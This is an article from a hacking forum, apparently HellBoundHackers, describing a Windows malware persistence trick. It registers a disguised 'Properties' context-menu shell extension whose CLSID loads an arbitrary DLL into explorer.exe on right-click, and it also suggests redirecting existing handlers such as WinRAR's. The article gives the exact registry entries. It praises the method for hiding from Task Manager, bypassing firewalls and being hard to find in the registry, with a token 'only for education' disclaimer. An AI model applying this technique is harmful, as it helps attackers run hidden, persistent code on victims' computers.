Follow us on Twitter!
Don't judge the unknown - Grindordie
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 33
Guests Online: 24
Members Online: 9

Registered Members: 82902
Newest Member: kcutta77
Latest Articles

New Startup

Arrow Image Not for beginners...



Hello folks...
i want to demonstrate you a \"new\" \"startup\" method.
Maybe new is the wrong word but, anyway, i never seen this method elsewhere.
Yeah i googled, too! But this differes to the other.
Try to google you wont find!

AT the end I ll show you the advanteges :)
And after reading you will see why qouteing \"new\" & \"startup\"

Ok here we go:

Our target is the Contextmenu, droping down
by a rightclick on a file or directory.
Lets take a look at mine (File-Contextmenu):

WE run regedit and goto
HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\

[CODE]
here are the entries:
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Offline Files]
@=\"{750fdf0e-2a26-11d1-a3ea-080036587f03}\"

[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Open With]
@=\"{09799AFB-AD67-11d1-ABCD-00C04FC30936}\"

[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Open With EncryptionMenu]
@=\"{A470F8CF-A1E8-4f65-8335-227475AA5C46}\"

[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Shell Extension for Malware scanning]
@=\"{45AC2688-0253-4ED8-97DE-B5370FA7D48A}\"

[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\WinRAR]
@=\"{B41DB860-8EE4-11D2-9906-E49FADC173CA}\"

[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}]
@=\"Start Menu Pin\"
[/CODE]

The Dir-Contextmenu\'s are similar.View yours here:
HKEY_CLASSES_ROOT\\Folder\\shellex\\ContextMenuHandlers\\

Now let us look what:
...
@=\"{B41DB860-8EE4-11D2-9906-E49FADC173CA}\"
...
means!

We goto:
HKEY_CLASSES_ROOT\\CLSID\\ and search the CLSID

jo, found this:
[CODE]
[HKEY_CLASSES_ROOT\\CLSID\\{B41DB860-8EE4-11D2-9906-E49FADC173CA}]
@=\"WinRAR\"

[HKEY_CLASSES_ROOT\\CLSID\\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\\InProcServer32]
@=\"C:\\\\Programme\\\\WinRAR\\\\rarext.dll\"
\"ThreadingModel\"=\"Apartment\"
[/CODE]
Hmmm my first idea was to change teh DLL path. So Explorer.exe would load it
when we RightClick(RC) on a file or dir!

Wow it works. But whats that...explorer hangs up! Hmm!
BTW the DLL is loaded only 1x The first time you RC on file or dir.
Then you cant make changes.To make changes youve to kill explorer.exe
and the do your changes. Create new task \"explorer.exe\" will give you next try.

But how we know, if the the user has Installed WinRar or similar tools we can steal??
Nahh...dont think of it! We do it better!
First we create an Windoz usual entry like Properties (file & dir Context) and
assign the following CLSID to the standard value:
[CODE]
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Properties]
@=\"{A41D8860-8EE4-11C2-9906-E49FADC173CB}\"

[HKEY_CLASSES_ROOT\\Folder\\shellex\\ContextMenuHandlers\\Properties]
@=\"{A41D8860-8EE4-11C2-9906-E49FADC173CB}\"

-----------------------------------
And finally the CLSID entry itself:
-----------------------------------
[HKEY_CLASSES_ROOT\\CLSID\\{A41D8860-8EE4-11C2-9906-E49FADC173CB}\\InProcServer32]
@=\"C:\\\\some.dll\"
\"ThreadingModel\"=\"Apartment\"
[/CODE]

But ints not the end! Now its your turn to code an working DLL.
Just code your Dll like your normal application. Thats enough for the start!
Care! Dont code your app/dll in a loop:
like
a=true;
while a=false do begin
...
if user=\'crazy\' then begin
a:=false;
end;
...
end;

Your app/dll must be able to process messages. Else your explorer will hang up!
Now ne creative!

=Advanteges=
-not shown in taskmanager(injected in explorer.exe)
-Firewallbypass (only when the user is stupid enough to let the explorer connect to internet)
-hard to locate in registry (without extra tools ;)

=Disadvanteges=
-Startup on RightClicking by user

Wo...phu my fingers...
I hope i brought you some usefull information!
When someone have approvements, message.
I did some grammer mistakes? Excuse me.
Correct me when you found sth. or if sth not clear enough!


And remember, only for education ...;)
KNOWLEDGE is POWER and that is what we want!

Comments
No Comments have been Posted.
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.